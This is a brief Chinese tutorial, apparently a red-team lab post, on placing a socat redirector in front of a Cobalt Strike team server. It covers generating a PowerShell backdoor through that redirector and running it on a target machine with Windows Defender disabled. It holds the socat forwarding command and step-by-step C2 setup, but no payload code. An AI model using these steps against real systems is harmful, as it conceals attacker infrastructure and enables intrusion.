设备需求:一台运行着Linux的系统的云服务器运行socat来转发流量
Linux云服务器的指令如下
sudo apt-get update(更新软件包不然找不到socat)
sudo apt-get install socat(安装socat)
screen(在Linux中,screen 是一个非常有用的终端多路复用器,它允许用户在一个单一的终端窗口中运行多个会话。使用 screen,你可以在后台运行程序,即使关闭了终端窗口,程序仍然会继续运行。)
注:如何关闭screen的后台会话,首先输入screen -ls(这将列出所有当前正在运行的 screen会话以及id)
输入screen -S [会话ID] -X quit(将 [会话ID] 替换为你想关闭的会话的实际 ID。)
或者进入到该会话中输入exit即可
云服务器输入sudo socat TCP4-LISTEN:80,fork TCP4:你的team服务器ip地址:80
命令的作用是将本地的 80 端口(通常是 HTTP 服务的默认端口)上的流量转发到指定的远程服务器(你的 Team 服务器)的 80 端口。确认对应的防火墙以及端口是否有开放/端口占用
检查80端口占用netstat -nap | grep 80
关闭服务 service apache2 stop(假设apache2正在占用端口号)
此时可以在cs工具里进行配置,通过云服务器的socat服务来访问team服务器
在http hosts里输入云服务器(socat)的ip地址,stager同样输入云服务器ip地址
点击save后
用redirector的ip地址来创建一个powershell后台木马
在localhost里面填入云服务器(redirector)的ip地址
listener选择我们刚刚创建的redirector的监听器
type选择powershell,勾选x64
此时会有一串命令行可以复制;
在靶机上运行win+r,粘贴生成的木马链接,记得关闭windows defender;
此时在cs工具将会有一个有效peyload出现,通过redirector来给我发get/post信息;
评论 (0)